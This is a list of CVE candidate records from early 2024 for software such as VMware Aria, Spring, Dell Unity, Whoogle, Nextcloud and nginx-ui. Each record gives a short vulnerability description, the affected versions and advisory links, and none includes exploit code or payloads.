CVE    2024    22241    Candidate    Aria Operations for Networks contains a cross site scripting vulnerability. A malicious actor with admin privileges can inject a malicious payload into the login banner and takeover the user account.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0002.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0002.html    Assigned (20240108)
CVE    2024    22240    Candidate    Aria Operations for Networks contains a local file read vulnerability. A malicious actor with admin privileges may exploit this vulnerability leading to unauthorized access to sensitive information.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0002.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0002.html    Assigned (20240108)
CVE    2024    22239    Candidate    Aria Operations for Networks contains a local privilege escalation vulnerability. A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain regular shell access.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0002.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0002.html    Assigned (20240108)
CVE    2024    22238    Candidate    Aria Operations for Networks contains a cross site scripting vulnerability. A malicious actor with admin privileges may be able to inject malicious code into user profile configurations due to improper input sanitization.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0002.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0002.html    Assigned (20240108)
CVE    2024    22237    Candidate    Aria Operations for Networks contains a local privilege escalation vulnerability. A console user with access to Aria Operations for Networks may exploit this vulnerability to escalate privileges to gain root access to the system.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0002.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0002.html    Assigned (20240108)
CVE    2024    22236    Candidate    In Spring Cloud Contract, versions 4.1.x prior to 4.1.1, versions 4.0.x prior to 4.0.5, and versions 3.1.x prior to 3.1.10, test execution is vulnerable to local information disclosure via temporary directory created with unsafe permissions through the shaded com.google.guava:guava dependency in the org.springframework.cloud:spring-cloud-contract-shade dependency.    MISC:https://spring.io/security/cve-2024-22236   |   URL:https://spring.io/security/cve-2024-22236    Assigned (20240108)
CVE    2024    22235    Candidate    VMware Aria Operations contains a local privilege escalation vulnerability. A malicious actor with administrative access to the local system can escalate privileges to 'root'.    MISC:https://www.vmware.com/security/advisories/VMSA-2024-0004.html   |   URL:https://www.vmware.com/security/advisories/VMSA-2024-0004.html    Assigned (20240108)
CVE    2024    22234    Candidate    In Spring Security, versions 6.1.x prior to 6.1.7 and versions 6.2.x prior to 6.2.2, an application is vulnerable to broken access control when it directly uses the AuthenticationTrustResolver.isFullyAuthenticated(Authentication) method. Specifically, an application is vulnerable if: * The application uses AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly and a null authentication parameter is passed to it resulting in an erroneous true return value. An application is not vulnerable if any of the following is true: * The application does not use AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly. * The application does not pass null to AuthenticationTrustResolver.isFullyAuthenticated * The application only uses isFullyAuthenticated via Method Security https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html or HTTP Request Security https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html    CONFIRM:https://security.netapp.com/advisory/ntap-20240315-0003/   |   MISC:https://spring.io/security/cve-2024-22234   |   URL:https://spring.io/security/cve-2024-22234    Assigned (20240108)
CVE    2024    22233    Candidate    In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC * Spring Security 6.1.6+ or 6.2.1+ is on the classpath Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.    MISC:https://spring.io/security/cve-2024-22233/   |   URL:https://spring.io/security/cve-2024-22233/    Assigned (20240108)
CVE    2024    22230    Candidate    Dell Unity, versions prior to 5.4, contains a Cross-site scripting vulnerability. An authenticated attacker could potentially exploit this vulnerability to steal session information, masquerade as the affected user, carry out any actions that this user could perform, or generally control the victim's browser.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20240108)
CVE    2024    22229    Candidate    Dell Unity, versions prior to 5.4, contain a vulnerability whereby log messages can be spoofed by an authenticated attacker. An attacker could exploit this vulnerability to forge log entries, create false alarms, and inject malicious content into logs that compromise log integrity. A malicious attacker could also prevent the product from logging information while malicious actions are performed or implicate an arbitrary user for malicious activities.    MISC:https://www.dell.com/support/kbdoc/en-us/000213152/dsa-2023-141-dell-unity-unity-vsa-and-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000213152/dsa-2023-141-dell-unity-unity-vsa-and-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20240108)
CVE    2024    22228    Candidate    Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_cifssupport utility. An authenticated attacker could potentially exploit this vulnerability, escaping the restricted shell and executing arbitrary operating system commands with root privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20240108)
CVE    2024    22227    Candidate    Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_dc utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability to execute commands with root privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20240108)
CVE    2024    22226    Candidate    Dell Unity, versions prior to 5.4, contain a path traversal vulnerability in its svc_supportassist utility. An authenticated attacker could potentially exploit this vulnerability, to gain unauthorized write access to the files stored on the server filesystem, with elevated privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20240108)
CVE    2024    22225    Candidate    Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_supportassist utility. An authenticated attacker could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20240108)
CVE    2024    22224    Candidate    Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_nas utility. An authenticated attacker could potentially exploit this vulnerability, escaping the restricted shell and executing arbitrary operating system commands with root privileges.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20240108)
CVE    2024    22223    Candidate    Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability within its svc_cbr utility. An authenticated malicious user with local access could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20240108)
CVE    2024    22222    Candidate    Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability within its svc_udoctor utility. An authenticated malicious user with local access could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20240108)
CVE    2024    22221    Candidate    Dell Unity, versions prior to 5.4, contains a SQL Injection vulnerability. An authenticated attacker could potentially exploit this vulnerability, leading to exposure of sensitive information.    MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities    Assigned (20240108)
CVE    2024    22220    Candidate    An issue was discovered in Terminalfour 7.4 through 7.4.0004 QP3 and 8 through 8.3.19, and Formbank through 2.1.10-FINAL. Unauthenticated Stored Cross-Site Scripting can occur, with resultant Admin Session Hijacking. The attack vectors are Form Builder and Form Preview.    MISC:https://docs.terminalfour.com/articles/release-notes-highlights/   |   MISC:https://docs.terminalfour.com/release-notes/security-notices/cve-2024-22220/    Assigned (20240108)
CVE    2024    22216    Candidate    In default installations of Microchip maxView Storage Manager (for Adaptec Smart Storage Controllers) where Redfish server is configured for remote system management, unauthorized access can occur, with data modification and information disclosure. This affects 3.00.23484 through 4.14.00.26064 (except for the patched versions 3.07.23980 and 4.07.00.25339).    MISC:https://www.microchip.com/en-us/solutions/embedded-security/how-to-report-potential-product-security-vulnerabilities/maxview-storage-manager-redfish-server-vulnerability   |   URL:https://www.microchip.com/en-us/solutions/embedded-security/how-to-report-potential-product-security-vulnerabilities/maxview-storage-manager-redfish-server-vulnerability    Assigned (20240108)
CVE    2024    22213    Candidate    Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. In affected versions users could be tricked into executing malicious code that would execute in their browser via HTML sent as a comment. It is recommended that the Nextcloud Deck is upgraded to version 1.9.5 or 1.11.2. There are no known workarounds for this vulnerability.    MISC:https://github.com/nextcloud/deck/commit/91f1557362047f8840f53151f176b80148650bcd   |   URL:https://github.com/nextcloud/deck/commit/91f1557362047f8840f53151f176b80148650bcd   |   MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-mg7w-x9fm-9wwc   |   URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-mg7w-x9fm-9wwc   |   MISC:https://hackerone.com/reports/2058556   |   URL:https://hackerone.com/reports/2058556    Assigned (20240108)
CVE    2024    22212    Candidate    Nextcloud Global Site Selector is a tool which allows you to run multiple small Nextcloud instances and redirect users to the right server. A problem in the password verification method allows an attacker to authenticate as another user. It is recommended that the Nextcloud Global Site Selector is upgraded to version 1.4.1, 2.1.2, 2.3.4 or 2.4.5. There are no known workarounds for this issue.    MISC:https://github.com/nextcloud/globalsiteselector/commit/ab5da57190d5bbc79079ce4109b6bcccccd893ee   |   URL:https://github.com/nextcloud/globalsiteselector/commit/ab5da57190d5bbc79079ce4109b6bcccccd893ee   |   MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-vj5q-f63m-wp77   |   URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-vj5q-f63m-wp77   |   MISC:https://hackerone.com/reports/2248689   |   URL:https://hackerone.com/reports/2248689    Assigned (20240108)
CVE    2024    22211    Candidate    FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    FEDORA:FEDORA-2024-01689e51e5   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PIQE3YSPOJPAUS7DPWIBTR5IQSQX35VM/   |   FEDORA:FEDORA-2024-f294ddb7fb   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/44VOA5KQQT7KQPW7CLST4Y4SQTKK3IOU/   |   MISC:https://github.com/FreeRDP/FreeRDP/commit/939e922936e9c3ae8fc204968645e5e7563a2fff   |   URL:https://github.com/FreeRDP/FreeRDP/commit/939e922936e9c3ae8fc204968645e5e7563a2fff   |   MISC:https://github.com/FreeRDP/FreeRDP/commit/aeac3040cc99eeaff1e1171a822114c857b9dca9   |   URL:https://github.com/FreeRDP/FreeRDP/commit/aeac3040cc99eeaff1e1171a822114c857b9dca9   |   MISC:https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-rjhp-44rv-7v59   |   URL:https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-rjhp-44rv-7v59    Assigned (20240108)
CVE    2024    22209    Candidate    Open edX Platform is a service-oriented platform for authoring and delivering online learning. A user with a JWT and more limited scopes could call endpoints exceeding their access. This vulnerability has been patched in commit 019888f.    MISC:https://github.com/openedx/edx-platform/blob/0b3e4d73b6fb6f41ae87cf2b77bca12052ee1ac8/lms/djangoapps/courseware/block_render.py#L752-L775   |   URL:https://github.com/openedx/edx-platform/blob/0b3e4d73b6fb6f41ae87cf2b77bca12052ee1ac8/lms/djangoapps/courseware/block_render.py#L752-L775   |   MISC:https://github.com/openedx/edx-platform/commit/019888f3d15beaebcb7782934f6c43b0c2b3735e   |   URL:https://github.com/openedx/edx-platform/commit/019888f3d15beaebcb7782934f6c43b0c2b3735e   |   MISC:https://github.com/openedx/edx-platform/security/advisories/GHSA-qx8m-mqx3-j9fm   |   URL:https://github.com/openedx/edx-platform/security/advisories/GHSA-qx8m-mqx3-j9fm    Assigned (20240108)
CVE    2024    22208    Candidate    phpMyFAQ is an Open Source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. The 'sharing FAQ' functionality allows any unauthenticated actor to misuse the phpMyFAQ application to send arbitrary emails to a large range of targets. The phpMyFAQ application has a functionality where anyone can share a FAQ item to others. The front-end of this functionality allows any phpMyFAQ articles to be shared with 5 email addresses. Any unauthenticated actor can perform this action. There is a CAPTCHA in place, however the amount of people you email with a single request is not limited to 5 by the backend. An attacker can thus solve a single CAPTCHA and send thousands of emails at once. An attacker can utilize the target application's email server to send phishing messages. This can get the server on a blacklist, causing all emails to end up in spam. It can also lead to reputation damages. This issue has been patched in version 3.2.5.    MISC:https://github.com/thorsten/phpMyFAQ/commit/a34d94ab7b1be9256a9ef898f18ea6bfb63f6f1e   |   URL:https://github.com/thorsten/phpMyFAQ/commit/a34d94ab7b1be9256a9ef898f18ea6bfb63f6f1e   |   MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9hhf-xmcw-r3xg   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9hhf-xmcw-r3xg    Assigned (20240108)
CVE    2024    22207    Candidate    fastify-swagger-ui is a Fastify plugin for serving Swagger UI. Prior to 2.1.0, the default configuration of `@fastify/swagger-ui` without `baseDir` set will lead to all files in the module's directory being exposed via http routes served by the module. The vulnerability is fixed in v2.1.0. Setting the `baseDir` option can also work around this vulnerability.    CONFIRM:https://security.netapp.com/advisory/ntap-20240216-0002/   |   MISC:https://github.com/fastify/fastify-swagger-ui/commit/13d799a2c5f14d3dd5b15892e03bbcbae63ee6f7   |   URL:https://github.com/fastify/fastify-swagger-ui/commit/13d799a2c5f14d3dd5b15892e03bbcbae63ee6f7   |   MISC:https://github.com/fastify/fastify-swagger-ui/security/advisories/GHSA-62jr-84gf-wmg4   |   URL:https://github.com/fastify/fastify-swagger-ui/security/advisories/GHSA-62jr-84gf-wmg4    Assigned (20240108)
CVE    2024    22206    Candidate    Clerk helps developers build user management. Unauthorized access or privilege escalation due to a logic flaw in auth() in the App Router or getAuth() in the Pages Router. This vulnerability was patched in version 4.29.3.    MISC:https://clerk.com/changelog/2024-01-12   |   URL:https://clerk.com/changelog/2024-01-12   |   MISC:https://github.com/clerk/javascript/releases/tag/%40clerk%2Fnextjs%404.29.3   |   URL:https://github.com/clerk/javascript/releases/tag/%40clerk%2Fnextjs%404.29.3   |   MISC:https://github.com/clerk/javascript/security/advisories/GHSA-q6w5-jg5q-47vg   |   URL:https://github.com/clerk/javascript/security/advisories/GHSA-q6w5-jg5q-47vg    Assigned (20240108)
CVE    2024    22205    Candidate    Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `window` endpoint does not sanitize user-supplied input from the `location` variable and passes it to the `send` method which sends a `GET` request on lines 339-343 in `request.py`, which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4.    MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L496-L557   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L496-L557   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L497   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L497   |   MISC:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda   |   URL:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda   |   MISC:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/   |   URL:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/    Assigned (20240108)
CVE    2024    22204    Candidate    Whoogle Search is a self-hosted metasearch engine. Versions 0.8.3 and prior have a limited file write vulnerability when the configuration options in Whoogle are enabled. The `config` function in `app/routes.py` does not validate the user-controlled `name` variable on line 447 and `config_data` variable on line 437. The `name` variable is insecurely concatenated in `os.path.join`, leading to path manipulation. The POST data from the `config_data` variable is saved with `pickle.dump` which leads to a limited file write. However, the data that is saved is earlier transformed into a dictionary and the `url` key value pair is added before the file is saved on the system. All in all, the issue allows us to save and overwrite files on the system that the application has permissions to, with a dictionary containing arbitrary data and the `url` key value, which is a limited file write. Version 0.8.4 contains a patch for this issue.    MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L419-L452   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L419-L452   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L437   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L437   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L444   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L444   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L447   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L447   |   MISC:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda   |   URL:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda   |   MISC:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/   |   URL:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/    Assigned (20240108)
CVE    2024    22203    Candidate    Whoogle Search is a self-hosted metasearch engine. In versions prior to 0.8.4, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a GET request on lines 339-343 in `request.py`, which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4.    MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L465-L490   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L465-L490   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L466   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L466   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L476   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L476   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479   |   
MISC:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda   |   URL:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda   |   MISC:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/   |   URL:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/    Assigned (20240108)
CVE    2024    22202    Candidate    phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. phpMyFAQ's user removal page allows an attacker to spoof another user's details, and in turn make a compelling phishing case for removing another user's account. Although the front-end of this page doesn't allow changing the form details, an attacker can utilize a proxy to intercept this request and submit other data. Upon submitting this form, an email is sent to the administrator informing them that this user wants to delete their account. An administrator has no way of telling the difference between the actual user wishing to delete their account or the attacker issuing this for an account they do not control. This issue has been patched in version 3.2.5.    MISC:https://github.com/thorsten/phpMyFAQ/commit/1348dcecdaec5a5714ad567c16429432417b534d   |   URL:https://github.com/thorsten/phpMyFAQ/commit/1348dcecdaec5a5714ad567c16429432417b534d   |   MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-6648-6g96-mg35   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-6648-6g96-mg35    Assigned (20240108)
CVE    2024    22201    Candidate    Jetty is a Java based web server and servlet engine. An HTTP/2 SSL connection that is established and TCP congested will be leaked when it times out. An attacker can cause many connections to end up in this state, and the server may run out of file descriptors, eventually causing the server to stop accepting new connections from valid clients. The vulnerability is patched in 9.4.54, 10.0.20, 11.0.20, and 12.0.6.    MISC:https://github.com/jetty/jetty.project/issues/11256   |   URL:https://github.com/jetty/jetty.project/issues/11256   |   MISC:https://github.com/jetty/jetty.project/security/advisories/GHSA-rggv-cv7r-mw98   |   URL:https://github.com/jetty/jetty.project/security/advisories/GHSA-rggv-cv7r-mw98    Assigned (20240108)
CVE    2024    22200    Candidate    vantage6-UI is the User Interface for vantage6. The docker image used to run the UI leaks the nginx version. To mitigate the vulnerability, users can run the UI as an angular application. This vulnerability was patched in 4.2.0.    MISC:https://github.com/vantage6/vantage6-UI/commit/92e0fb5102b544d5bcc23980d973573733e2e020   |   URL:https://github.com/vantage6/vantage6-UI/commit/92e0fb5102b544d5bcc23980d973573733e2e020   |   MISC:https://github.com/vantage6/vantage6-UI/security/advisories/GHSA-8wxq-346h-xmr8   |   URL:https://github.com/vantage6/vantage6-UI/security/advisories/GHSA-8wxq-346h-xmr8    Assigned (20240108)
CVE    2024    22199    Candidate    This package provides universal methods to use multiple template engines with the Fiber web framework using the Views interface. This vulnerability specifically impacts web applications that render user-supplied data through this template engine, potentially leading to the execution of malicious scripts in users' browsers when visiting affected web pages. The vulnerability has been addressed: the template engine now defaults to having autoescape set to `true`, effectively mitigating the risk of XSS attacks.    MISC:https://github.com/gofiber/template/commit/28cff3ac4d4c117ab25b5396954676d624b6cb46   |   URL:https://github.com/gofiber/template/commit/28cff3ac4d4c117ab25b5396954676d624b6cb46   |   MISC:https://github.com/gofiber/template/security/advisories/GHSA-4mq2-gc4j-cmw6   |   URL:https://github.com/gofiber/template/security/advisories/GHSA-4mq2-gc4j-cmw6    Assigned (20240108)
CVE    2024    22198    Candidate    Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to arbitrary command execution by abusing the configuration settings. The `Home > Preference` page exposes a list of system settings such as `Run Mode`, `Jwt Secret`, `Node Secret` and `Terminal Start Command`. While the UI doesn't allow users to modify the `Terminal Start Command` setting, it is possible to do so by sending a request to the API. This issue may lead to authenticated remote code execution, privilege escalation, and information disclosure. This vulnerability has been patched in version 2.0.0.beta.9.    MISC:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/settings.go#L18   |   URL:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/system/settings.go#L18   |   MISC:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/terminal/pty.go#L11   |   URL:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/api/terminal/pty.go#L11   |   MISC:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/internal/pty/pipeline.go#L29   |   URL:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/internal/pty/pipeline.go#L29   |   MISC:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/router/middleware.go#L45   |   URL:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/router/middleware.go#L45   |   MISC:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/settings/server.go#L12   |   URL:https://github.com/0xJacky/nginx-ui/blob/04bf8ec487f06ab17a9fb7f34a28766e5f53885e/settings/server.go#L12   |   MISC:https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3   |   
URL:https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3   |   MISC:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-8r25-68wm-jw35   |   URL:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-8r25-68wm-jw35    Assigned (20240108)
CVE    2024    22197    Candidate    Nginx-ui provides online statistics for server indicators: monitor CPU usage, memory usage, load average, and disk usage in real-time. The `Home > Preference` page exposes a small list of nginx settings such as `Nginx Access Log Path` and `Nginx Error Log Path`. However, the API also exposes `test_config_cmd`, `reload_cmd` and `restart_cmd`. While the UI doesn't allow users to modify any of these settings, it is possible to do so by sending a request to the API. This issue may lead to authenticated Remote Code Execution, Privilege Escalation, and Information Disclosure. This issue has been patched in version 2.0.0.beta.9.    MISC:https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3   |   URL:https://github.com/0xJacky/nginx-ui/commit/827e76c46e63c52114a62a899f61313039c754e3   |   MISC:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-pxmr-q2x3-9x9m   |   URL:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-pxmr-q2x3-9x9m    Assigned (20240108)
